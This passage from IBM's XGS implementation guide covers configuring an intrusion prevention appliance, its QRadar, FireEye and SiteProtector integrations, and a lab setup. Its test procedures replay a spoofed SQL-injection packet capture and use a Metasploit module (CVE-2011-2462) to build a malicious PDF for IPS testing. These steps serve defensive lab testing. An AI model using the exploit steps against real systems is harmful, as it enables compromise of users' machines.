of a quarantine rule by the IPS Event Filter.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the active quarantine rule that was created.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
217
Implementation Guide for IBM Security Network Protection
Configuring the IP reputation, IP location, and
IDS (monitoring) mode
This use case describes how to configure the IP Reputation database so that the events
generated by XGS include IP Reputation and IP Location information. IP Reputation and IP
Location provide reputation and geographic location information for both source and target IP
addresses for an event. In this example, if a given source IP address is flagged as being a
source for spam and is located in a country rated as high for spam origination, the source IP
address in question is likely a spam source. In this example, traffic is generated to simulate traffic
originating from a malicious source.
Tip: To receive updates to application and IP reputation databases, you must enable
auto updating. You cannot manually update application and IP reputation databases.
XGS requires a connection to the Internet to download updates for the application
and IP reputation databases.
218
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Ensuring that the IP Reputation Database is updated
The Overview page displays current information about the Network Protection XGS firmware,
intrusion prevention content, update servers, licenses, and the XGS performance level. To
navigate to the Overview page, click the Manage System Settings link from the main menu and
then click Overview under Updates and Licensing. Take note of the status and last update
information for the IP Reputation Database. IBM provides updates to the database daily.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
219
Implementation Guide for IBM Security Network Protection
Enabling the IP Reputation for events
To navigate to the Manage Application Databases page, click the Manage System Settings link
from the main menu and then click Application Database Settings under Updates and
Licensing.
220
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the Include IP Reputation Info check box. Save the configuration and deploy the
changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
221
Implementation Guide for IBM Security Network Protection
Configuring the Inspection mode for the Protection Interfaces
To navigate to Protection Interfaces, click the Manage System Settings link from the main
menu and then click Protection Interfaces under the Network Settings.
Set the Inspection Mode for the respective ports) to Monitoring. Save the configuration and
deploy the changes.
222
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Simulating traffic
To test the traffic from external IP addresses, create an attack packet and modify the source IP
address.
Connect a Linux VM with a protection port.
Change the source IP address of the provided attack packet data using the tcprewrite command.
In this example, change 192.168.5.1 to 91.216.73.32 in the
HTTP_GET_SQL_UnionSelect.pcap.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
223
Implementation Guide for IBM Security Network Protection
Replay the crafted packet capture using the tcpreplay command.
XGS detects attack and identifies IP and Location reputation
for the event generated
To navigate to the IPS Events, click the Monitor Analysis and Diagnostics link from the main
menu and then click Event Log. Select the IPS Events tab. XGS has generated events for the
associated attacks.
224
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring QRadar Right-click integration
This use case describes how to configure the QRadar Right-Click integration, which allows a
QRadar operator/analyst to right-click an IP address in the QRadar Console and create a
quarantine rule on XGS to block the traffic to or from the IP address. In this example, QRadar
generates an offense for a suspicious communication from a compromised client PC and the
analyst assesses the flow data and blocks all communication from the PC using QRadar
Right-Click integration.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
225
Implementation Guide for IBM Security Network Protection
Configuring a QRadar Advanced Threat Protection agent on
XGS
Log on to the LMI and navigate to Manage System Settings > Network Settings > Advanced
Threat Protection Agents.
Click the New button and enter the following parameters:
Name: qradar (you can specify a name to identify this configuration)
Agent Type: QRadar
Address: 192.168.5.101 (IP address of QRadar Console)
User name: qradar_atp
Password: Passw0rd
Save the configuration changes.
226
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring the RightClick module on the QRadar console
Download the RightClick-ISNP-Alert RPM from the IBM Download Center.
The RightClick module supports QRadar Console version 7.2 MR1
(7.2.1.694499) and above.
Note:
Copy the RPM file to a folder on the QRadar Console using an SCP client and type the following
command to install the RPM.
Edit the isnp_alert.conf file using the vi command.
Specify the endpoint URL parameter (https://<xgs management IP
address>/agent_alert_listener) and the credentials, and save the changes.
The credentials specified in the isnp_alert.conf file must match the
credentials that you used when you configured the QRadar Advanced Threat
Protection agent on XGS in the previous step.
Note:
Tip: To send Advanced Threat Policy (ATP) events to multiple XGS appliances,
duplicate the three lines and specify the different label names as shown below.
first_label.endpoint=https://xgs1.example.com/agent_alert_listner
first_label.username=admin1
_label.password=Passw1rd
second_label.endpoint=https://xgs2.example.com/agent_alert_listner
second_label.username=admin2
second_label.password=Passw2rd
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
227
Implementation Guide for IBM Security Network Protection
Type the following command to obfuscate the password parameter in the isnp_alert.conf file.
This step is optional.
The command obfuscates the parameter rather than encrypting it because the
encryption logic is hardcoded in the script.
The -T decrypt parameter is used to decrypt the contents of the file.
Note:
Restart the tomcat server on the QRadar Console, navigate to the Admin tab > Advanced, and
click Restart Web Server.
Tip: You can also restart Tomcat by entering the following command on the QRadar
Console: # service tomcat restart.
Generating an ISNP alert from the QRadar console
Log on to the QRadar Console and navigate to the Network Activity or Log Activity view.
Right-click a source IP destination IP address and select Generate ISNP Alert under Plugin
options.
228
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
QRadar launches a pop-up window that contains the results of the isnp_alert.pl command.
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
229
Implementation Guide for IBM Security Network Protection
To verify the event detail, select the event and click View Details. In this example, the event from
QRadar has been mapped to a Reputation (High) ATP event, which created a quarantine rule.
Select the System Events tab and verify the system event that was triggered due to the creation
of the quarantine rule.
230
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select Secure Policy Configuration > Security Policies and navigate to Advanced Threat
Policy.
QRadar has 20 predefined rules, consisting of five Alert Types (Compromise, Exposure,
Intrusion, Malware, and Reputation) and four Alert Severities (High, Medium, Low and Unknown).
Some rules have been configured with quarantine responses. In this example, QRadar
generates a Reputation alert with High severity. This triggers the ATP-Reputation-Host
quarantine response.
You can modify the Alert type and severity in the event by configuring the
arielRightClick.properties file under the /opt/qradar/conf directory on the QRadar
console.
Note:
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule triggered by the Advanced Threat Policy rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
231
Implementation Guide for IBM Security Network Protection
Optional: Deleting the Active Quarantine rule
You can delete the quarantine rule by selecting the active rule and clicking the delete button.
Click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log.
Select the System Events tab. Verify the system event created for the deletion of the quarantine
rule.
232
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Customizing QRadar Right-click integration
This customization use case describes how to add customized actions to the QRadar Right-Click
integration menu on the QRadar console so that you can send an ATP event with various event
types and severities. This section also contains procedures about creating new quarantine
response objects and setting the objects in an Advanced Threat Policy rule on XGS.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
233
Implementation Guide for IBM Security Network Protection
Configuring the QRadar Right-Click option
QRadar supports the customization of the Right-Click option on the QRadar console. The
Right-Click option allows the user to pass field values such as the IP address and port to any
command line utilities as command line parameters. The configurations are defined in the
arielRightClick.properties file under the /opt/qradar/conf directory on the QRadar console.
Enter the following command to edit the configuration file:
# vi /opt/qradar/conf/arielRightClick.properties
Specify the information for the <label>.arielProperty field. The RightClick
module uses this information when the user right-clicks a field value on the QRadar
Console. For example, if the user specifies sourceIP, then that user can execute the
command (defined by <label>.command) by right-clicking the source IP address in
the QRadar Console.
<label>.text is shown as a plugin name on the web console.
<label>.useFormattedValue is always false.
<label>.command is always /opt/isnp/isnp_alert.pl for this integration.
<label>.arguments contains the CLI parameters of the isnp_alert.pl command.
These parameters can be used to specify Alert type and Alert severity.
Note:
234
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
To define a new action, add the ISNPCustomAction to pluginActions parameter and specify
the five parameters for the ISNPCustomAction label.
You can use the following command line parameters to specify the Alert type
and severity:
Note:
-C: To specify the configuration file that contains the URL and authentication
parameters.
-T: To specify the Alert type to trigger the respective Advanced Threat Policy rules.
-s: To specify the Alert severity to trigger the respective Advanced Threat Policy rules.
0-3 is low, 4-7 is medium, 8-9 is high and others are categorized as unknown. The
default value is 5.
Copy isnp_alert.conf to create a new configuration file. This configuration is required for the
previous plugin customizaton step and used in ISNPCustomAction.<argument>
If the parameters in the configuration file are encrypted or obfuscated, you
must decrypt the file before you copy it.
Note:
Type the following command to restart the tomcat server.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
235
Implementation Guide for IBM Security Network Protection
Creating a new quarantine response
Select Secure Policy Configuration > Security Policies and navigate to the Advanced Threat
Policy.
By default, the policy generates an Event Log when XGS receives an Intrusion alert with a low
severity from QRadar.
Select the QRadar:Intrusion:Low rule and click the Edit button to add a quarantine response.
236
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select New > Quarantine to create a Quarantine response for this ATP rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
237
Implementation Guide for IBM Security Network Protection
Type the following values and save the setting:
Name: Test quarantine
Comment: Host/Port pair
Type: Intrusion
Select the Intruder Address, Intruder Port, Victim Address, and Victim Port check boxes.
The Quarantine type that you configured in this step must be the same type
that you specified in the Advanced Threat Policy rule. In this example, both are set as
Intrusion.
Note:
238
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Add the new Test quarantine Quarantine object to Current Responses.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
239
Implementation Guide for IBM Security Network Protection
Save the configuration and deploy the change.
240
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Generating the custom ISNP alert from QRadar console
Log on to the QRadar Console and navigate to Network Activity or Log Activity view.
Right-click a source IP or destination IP address and select Generate Custom ISNP Alert under
Plugin options.
QRadar launches a pop-up window that contains the results of the isnp_alert.pl command.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
241
Implementation Guide for IBM Security Network Protection
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
To view the event details, select the event and click View Details. In this example, the event
from QRadar has been mapped to Intrusion (Low), which created a quarantine rule.
242
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The event details include information such as the Agent Alert Details
(Connection), type of protocol, source IP address, source port, destination IP
address, and destination port. In the previous use case, the Agent Alert Details was
Host. The difference is based on the arguments specified in the
arielRightClick.properties file.
Note:
In this example, if a user clicks on a source IP address on the QRadar Console and
runs the following action, only the source IP address and/or source IPv6 address will
be included in the alert.
Select the System Events tab and verify the system event that was triggered because the
quarantine rule based on the Advanced Threat event was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule that was triggered.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
243
Implementation Guide for IBM Security Network Protection
Configuring Generic ATP agent integration
This use case describes how to configure the Generic APT agent and how to create and send an
Advanced Threat event. You can used this type of event to trigger quarantine rules based on the
notification of third-party security products. The Advanced Threat event is based on XML and the
schema is available on the IBM website. In this example, the XML-based Advanced Threat event
is sent using the Linux-based Curl command line tool.
Tip: Curl is a command line tool that can be used to send HTTP/HTTPS request
methods such as POST and GET. The tool is preinstalled on most Linux distributions.
The Windows version is also available for download and can be used for
demonstration and testing.
244
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring a generic ATP agent on XGS
Log on to the LMI of XGS and navigate to Manage System Settings > Network Settings >
Advanced Threat Protection Agents.
Click the New button and enter the following parameters:
Name: custom (you can specify a name to identify this configuration)
Agent Type: Generic
Address: 192.168.5.140 (The IP address of the system that sends the Advanced Threat
event to XGS. In this example, it is the IP address of the client PC where the Curl command line
utility will be executed.)
User name: generic_atp
Password: Passw0rd
Save the configuration and deploy the changes.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
245
Implementation Guide for IBM Security Network Protection
Generating an Advanced Threat alert using the curl command
To send an Advanced Threat event to the alert listening service on XGS, create a test XML file
on the client PC. In this example, the event type is intrusion and the severity is low.
Tip: The XML schema is available in Technote through IBM Support Website:
http://www-01.ibm.com/support/docview.wss?uid=swg21662387.
Type the following curl command to send the Advanced Threat event as a HTTP POST request.
The credential specified with -u option has to be same as the username and
password specified in the LMI in the previous step.
Note:
246
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Verifying the ATP response in XGS
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
To verify the event detail, select the event and click View Details. In this example, the event from
the Generic agent has been mapped to Intrusion (Medium), which created a quarantine rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
247
Implementation Guide for IBM Security Network Protection
Select the System Events tab and verify the system event that was triggered because the
quarantine rule based on the Advanced Threat event was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the quarantine rule that was triggered.
248
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring FireEye Web MPS integration
This use case describes how to configure the FireEye Web MPS integration to enable XGS to
receive notifications from FireEye and generate the quarantine rules. In this example, FireEye
Web MPS detects a malware-callback and sends the notification alert using HTTP POST request.
XGS parses the notification, maps it to the Advanced Threat events, and creates two quarantine
rules for both the infected PC and the malicious (C&C) server.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
249
Implementation Guide for IBM Security Network Protection
Configuring a FireEye ATP agent on XGS
Log on to the XGS LMI and navigate to Manage System Settings > Network Settings >
Advanced Threat Protection Agents.
Click the New button and enter the following parameters:
Name: feye (you can specify a name to identify this configuration)
Agent Type: FireEye WebMPS 6.2
Address: 192.168.115.150 (IP address of FireEye WebMPS)
User name: feye
Password: Passw0rd
Click Save Configuration and deploy the changes.
250
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring event notifications on the FireEye WebMPS
Navigate to https://192.168.115.150 to log on to the FireEye web interface.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
251
Implementation Guide for IBM Security Network Protection
To access the HTTP notification configuration, select the Setting tab and click Notifications.
Then click the http column header to view the HTTP settings.
You can use the default parameters for the HTTP settings:
Default delivery: Per event
Default provider: Generic
Default format: XML Normal
Specify a name for the HTTP server to identify XGS and click the Add HTTP server button.
252
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Enter the following parameters for the HTTP Server Listing section and click the Update button.
Enabled: enable
Server Url: https://192.168.115.186/agent_alert_listener
Username: feye
Password: Passw0rd
SSL Enabled: enable
Use the username and password that you specified during the FireEye ATP
agent configuration on XGS in the previous steps.
Note:
Mapping FireEye notifications to ATP events
On XGS, access the LMI and select Secure Policy Configuration > Security Policies and
navigate to Advanced Threat Policy.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
253
Implementation Guide for IBM Security Network Protection
FireEye has12 predfined rules, which consist of three Alert Types and four Alert Severities.
Some of the rules have been configured with a quarantine response.
The Malware-Callback notification sent by FireEye WebMPS is identified by XGS as a
Compromise ATP alert and Reputation ATP alert. In this scenario, the source IP address in the
Malware-callback notification belongs to the infected PC and is added to the Compromise ATP
alert. The IP address is quarantined by the ATP-Compromise-Host quarantine object. The
destination IP address belongs to the C&C server and is added to the Reputation ATP alert. The
IP address is quarantined by the ATP-Reputation-Host object.
The Malware-Object notification sent by FireEye WebMPS is identified by XGS as a Malware
ATP alert. In this scenario, the source IP address in the notification is a server that sends
malware to a client and the IP address is marked as an Intruder Host address. The destination
IP is the client PC that received the malware and the IP address is treated as a Victim Host
address. The ATP-Malware-Intruder quarantine object is defined as a response for Malware
ATP rule. The quarantine object uses the Intruder Host address to create an active quarantine
rule.
The Web-Infection notification sent by FireEye WebMPS is identified by XGS as a Reputation
alert. In this scenario, if a client accesses a malicious URL, the URL is marked as a Target URL.
The ATP-Reputation-URL quarantine object is defined as a response for the Reputation ATP
rule. The quarantine object uses the URL to create an active quarantine rule.
254
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The notification sent by FireEye is XML based. The Web-Infection notification
includes the main URL, called the ObjURL, and some other suspicious URLs. The
FireEye integration includes only the ObjURL in the Web-infection alert.
Note:
For the Severity mapping, XGS maps FireEye’s Crit, Majr, and Minr severity values to high,
medium, and low severity in the APT alert. For other severity values, XGS maps them to the
unknown severity in the APT alert.
Optional: Generating a FireEye event using the FireEye web
console
On the FireEye web console, select an event type for testing and click the Test-Fire button.
The FireEye ATP agent configuration on XGS can only receive and process
Malware Callback, Malware Object, and Web Infection events.
Note:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
255
Implementation Guide for IBM Security Network Protection
The FireEye console might generate some errors (as shown below) when
testing is being done on the notification. In such situations, consider using the FireEye
CLI utility.
Note:
Note:
Connecting to the FireEye CLI console to send test
notification
Connect to the FireEye appliance using an SSH client and type enable and configure terminal
to use a command to send notification event.
256
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Testing a Malware Callback event
Type the following command to send the Malware Callback notification via HTTP.
fenotify test-fire malware-callback
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
In the case of the malware-callback, the FireEye event notifcaiton is identified by XGS as a
Compromise ATP event and Reputation ATP event. The critical severity value is mapped to
the high severity on XGS.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
257
Implementation Guide for IBM Security Network Protection
To verify the event detail, select an event and click View Details.
258
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
259
Implementation Guide for IBM Security Network Protection
Select the System Events tab and verify the system events that were triggered because two
quarantine rules based on the Malware-callback notification were created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify the two active quarantine rules that were triggered.
260
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Testing a Malware Object event notification
Type the following command to send Malware Object notification via HTTP.
fenotify test-fire malware-object
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu, and click Event Log. Select the Advanced Threat Events tab.
In the case of the malware-object, the FireEye event notifcaiton is mapped to the Malware ATP
event. The major severity value is mapped to the medium severity on XGS.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
261
Implementation Guide for IBM Security Network Protection
To view the event detail, select each event and click View Details.
262
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the System Events tab and verify the system events that were triggered because the
quarantine rule based on the Malware-object notification was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify that the quarantine rule was created.
Testing Web Infection event notification
Type the following command to send Web Infection notification via HTTP.
fenotify test-fire web-infection
To navigate to the Advanced Threat Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Advanced Threat Events tab.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
263
Implementation Guide for IBM Security Network Protection
In the case of the Web-infection notification, the FireEye event notification is mapped to the
Reputation ATP event. The major severity value is mapped to the medium severity on XGS.
To view the event detail, select each event and click View Details.
264
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the System Events tab and verify the system events that were triggered because the
quarantine rule based on the Web-infection notification was created.
Select Secure Policy Configuration > Security Policies, navigate to Active Quarantine
Rules, and verify that the quarantine rule was created.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
265
Implementation Guide for IBM Security Network Protection
Integrating with SiteProtector
This section focuses on the procedure to register XGS to SiteProtector.
When you register XGS with SiteProtector, some areas of the local
management interface become read only. When you unregister XGS from the
SiteProtector system, the local management interface becomes fully functional
again.
Note:
Tip: You can configure XGS to send SNMP/Email/Remote Syslog alerts if the
connectivity with the SiteProtector system stops. Configure these alerts in Manage
System Settings > System Alerts.
266
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Verify the IP address of SiteProtector.
Use the XGS command line interface to ping the SiteProtector IP address.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
267
Implementation Guide for IBM Security Network Protection
To navigate to SiteProtector Management, click Manage System Settings from the main menu
and select SiteProtector Management under System Settings.
268
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the Register with SiteProtector check box and specify the Agent Name for XGS that
will appear in SiteProtector. Specify the SiteProtector Group Name for XGS. Set the Heartbeat
Interval to 300. Click the New button to add the Agent Manager information that XGS will send
a heartbeat message to.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
269
Implementation Guide for IBM Security Network Protection
Select the Enable check box . Enter 1 in the Priority field. Enter the Agent Manager name
(found on the Agent tab of the SiteProtector Console) in the Agent Manager Name field. The
Agent Manager Name is case sensitive. Set the Authentication Level to First Time Trust.
Enter the IP address of the Agent Manager in the Agent Manager Address field. Save the
configuration and deploy the changes.
270
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The local management interface displays a notification about XGS being managed by
SiteProtector.
To unregister XGS from the SiteProtector system, clear the Register With
SiteProtector check box.
Note:
XGS is registered to SiteProtector.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
271
Implementation Guide for IBM Security Network Protection
Installing an XGS fix pack
This section focuses on the procedure to install a fix pack on XGS.
Unzip the fix pack file 5.2.0.0-ISS-XGS-All-Models-Hotfix-FP0002.zip.
Access the LMI, navigate to Fix Packs, click the Manage System Settings link from the main
menu, and click Fix Packs under Updates and Licensing.
Click the New button.
272
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Browse for fix pack button.
Browse to the directory where you extracted the zip file, select the file that you need to upload,
and click the Open button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
273
Implementation Guide for IBM Security Network Protection
Click Save Configuration.
Restart XGS by navigating to Manage System Settings on the main menu and selecting
Restart to Shut Down under System Settings.
274
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Restart button.
Click the Yes button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
275
Implementation Guide for IBM Security Network Protection
Creating a PDF file for IPS testing
Log on to a Kali Linux and start the Metasploit Framework Console.
Use the adobe_reader_u3d (CVE-2011-2462) exploit module and set the target.
276
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Specify the file name of the PDF and run exploit to create a PDF file.
Copy the PDF file to the vulnerable web server at 192.168.5.111.
The file can be downloaded from http://192.168.5.111/xgs4techies.pdf.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
277
Implementation Guide for IBM Security Network Protection
Preparing a virtual environment for study
Access developerWorks at the following URL and download the XGS virtual appliance with a
30-day license key: http://www.ibm.com/developerworks/downloads/security/xgs/index.html.
Download the VM image (OVA), license file, and setup guide.
278
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Prepare the XGS virtual appliance on a VMWare workstation environment and connect the XGS,
client, and web server with virtual switches. The following picture shows a sample network to run
most of the use cases in this guide.
To modify virtual network configuration, open Virtual Network Editor.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
279
Implementation Guide for IBM Security Network Protection
Select Vmnet8 and enter 192.168.5.0 in the Subnet IP field. Click OK to close the window.
The Virtual Network Editor doesn’t show Vmnet7 network, but it is configured
as a network without Subnet IP and available for each VM instances as default.
Note:
280
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
281
Implementation Guide for IBM Security Network Protection
Notices
This information was developed for products and services offered in the U.S.A. IBM may not
offer the products, services, or features discussed in this document in other countries. Consult
your local IBM representative for information on the products and services currently available in
your area. Any reference to an IBM product, program, or service is not intended to state or imply
that only that IBM product, program, or service may be used. Any functionally equivalent product,
program, or service that does not infringe any IBM intellectual property right may be used instead.
However, it is the user's responsibility to evaluate and verify the operation of any non-IBM
product, program, or service.
IBM may have patents or pending patent applications covering subject matter described in this
document. The furnishing of this document does not give you any license to these patents. You
can send license inquiries, in writing, to:
IBM Director of Licensing IBM Corporation North Castle Drive Armonk, NY 10504-1785 U.S.A.
For license inquiries regarding double-‐byte character set (DBCS) information, contact the
IBM Intellectual Property Department in your country or send inquiries, in writing, to:
Intellectual Property Licensing Legal and Intellectual Property Law IBM Japan, Ltd. 19-21,
Nihonbashi-Hakozakicho, Chuo-ku Tokyo 103-8510, Japan
The following paragraph does not apply to the United Kingdom or any other country
where such provisions are inconsistent with local law :
INTERNATIONAL BUSINESS MACHINES CORPORATION PROVIDES THIS PUBLICATION
"AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON-INFRINGEMENT,
MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
Some states do not allow disclaimer of express or implied warranties in certain transactions,
therefore, this statement might not apply to you.
This information could include technical inaccuracies or typographical errors. Changes are
periodically made to the information herein; these changes will be incorporated in new editions of
the publication. IBM may make improvements and/or changes in the product(s) and/or the
program(s) described in this publication at any time without notice.
Any references in this information to non-IBM Web sites are provided for convenience only and
do not in any manner serve as an endorsement of those Web sites. The materials at those Web
sites are not part of the materials for this IBM product and use of those Web sites is at your own
risk.
IBM may use or distribute any of the information you supply in any way it believes appropriate
without incurring any obligation to you.
Licensees of this program who wish to have information about it for the purpose of enabling: (i)
the exchange of information between independently created programs and other programs
282
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
(including this one) and (ii) the mutual use of the information which has been exchanged, should
contact: IBM Corporation 2Z4A/101 11400 Burnet Road Austin, TX 78758 U.S.A.
Such information may be available, subject to appropriate terms and conditions, including in
some cases payment of a fee.
The licensed program described in this document and all licensed material available for it are
provided by IBM under terms of the IBM Customer Agreement, IBM International Program
License Agreement or any equivalent agreement between us.
Any performance data contained herein was determined in a controlled environment. Therefore,
